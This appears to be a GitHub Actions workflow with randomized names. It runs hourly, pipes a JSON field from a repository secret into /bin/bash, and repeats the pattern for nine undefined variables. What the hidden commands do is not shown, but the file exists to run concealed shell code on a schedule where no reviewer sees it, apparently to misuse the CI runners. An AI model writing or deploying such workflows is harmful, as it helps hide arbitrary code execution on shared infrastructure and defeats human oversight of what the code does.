name: xiaonaihong2374

on:
  workflow_dispatch:
  schedule:
    - cron: '8 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaonaihong2374
        env:
          jx84: ${{ secrets.jx84 }}
        run: |
          echo $jx84 | jq -r .gce09678 | /bin/bash
          echo $vy3251 | jq -r .b4569 | /bin/bash
          echo $umt697 | jq -r .zr059 | /bin/bash
          echo $owgnl6 | jq -r .ylitc720 | /bin/bash
          echo $hvb08181 | jq -r .qg38 | /bin/bash
          echo $zlff2031 | jq -r .ffid05768 | /bin/bash
          echo $oyi57 | jq -r .l48 | /bin/bash
          echo $spyaf723 | jq -r .xati610 | /bin/bash
          echo $lyw6375 | jq -r .j2025 | /bin/bash
          echo $m9 | jq -r .vot3071 | /bin/bash

